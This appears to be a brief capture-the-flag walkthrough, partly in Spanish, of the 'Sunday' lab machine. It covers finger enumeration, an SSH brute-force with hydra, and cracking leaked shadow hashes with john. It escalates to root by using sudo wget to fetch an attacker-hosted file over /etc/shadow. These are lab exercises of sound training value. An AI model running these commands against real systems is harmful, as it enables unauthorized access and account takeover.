Nmap scan report for 10.10.10.76 Host is up (0.033s latency). Not shown: 56610 filtered ports, 8920 closed ports PORT STATE SERVICE 79/tcp open finger 111/tcp open rpcbind 22022/tcp open SSH-2.0-Sun_SSH_1.3 41227/tcp open unknown 56745/tcp open unknown
Ok, aquí se pone divertido no se que son esos puertos ja.
msf auxiliary(scanner/finger/finger_users) > run finger [email protected] Login Name TTY Idle When Where sammy sammy pts/2 <Apr 24 12:57> 10.10.14.4
ssh -p 22022 [email protected]
hydra -s 22022 -l sammy -P /root/Desktop/rockyou.txt 10.10.10.76 -t 4 ssh -V -F
sunny@sunday:/$ find -name 'backup*' -print sunny@sunday:/$ cd ./backup/ sunny@sunday:/backup$ ls agent22.backup shadow.backup sunny@sunday:/backup$ cat shadow.backup mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
https://www.aychedee.com/2012/03/14/etc_shadow-password-hash-formats/
root@kali:~# unshadow '/root/Desktop/passwd' '/root/Desktop/shadow' > mypasswd2 root@kali:~# john --wordlist='/root/Desktop/rockyou.txt' mypasswd root@kali:~# john --wordlist='/root/Desktop/rockyou.txt' mypasswd Warning: detected hash type "sha256crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x]) Remaining 1 password hash Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:02 0.02% (ETA: 18:25:10) 0g/s 1648p/s 1648c/s 1648C/s cheska..oooooo 0g 0:00:00:18 0.16% (ETA: 19:03:45) 0g/s 1530p/s 1530c/s 1530C/s simina..chiquititas cooldude! (sammy) 1g 0:00:02:12 DONE (2018-06-22 16:03) 0.007567g/s 1542p/s 1542c/s 1542C/s coolpeople..chrystelle Use the "--show" option to display all of the cracked passwords reliably Session completed root@kali:~# ssh -p 22022 [email protected] Password: Last login: Tue Apr 24 12:57:03 2018 from 10.10.14.4 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sudo wget 10.10.14.6:8001/shadow -O /etc/shadow
su root
password de mi kali y ya.